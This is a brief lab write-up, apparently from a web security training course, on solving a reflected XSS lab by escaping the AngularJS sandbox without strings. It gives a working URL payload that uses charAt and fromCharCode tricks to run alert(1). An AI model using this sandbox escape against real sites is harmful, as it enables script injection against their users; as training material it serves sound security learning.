LAB 25 - Reflected XSS with AngularJS sandbox escape without strings¶
Initial instructions¶
This lab uses AngularJS in an unusual way where the $eval function is not available and you will be unable to use any strings in AngularJS.¶
To solve the lab, perform a cross-site scripting attack that escapes the sandbox and executes the alert function without using the $eval function.¶
To solve this lab I used the following XSS payload.
&toString().constructor.prototype.charAt%3d[].join;[1]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)=1
And I pasted into the URL like the following image.
